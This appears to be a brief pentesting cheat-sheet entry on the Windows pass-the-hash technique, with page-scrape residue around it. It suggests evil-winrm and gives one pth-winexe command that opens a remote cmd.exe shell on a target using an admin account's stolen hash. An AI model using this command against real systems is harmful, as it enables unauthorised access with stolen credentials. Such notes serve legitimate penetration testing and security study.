8 lines
130 B
Markdown
8 lines
130 B
Markdown
|
# Pass the Hash
|
||
|
|
||
|
* Authenticate with retrieved hash
|
||
|
* User evil-winrm or
|
||
|
```
|
||
|
pth-winexe -U 'admin%hash' //<target-IP> cmd.exe
|
||
|
```
|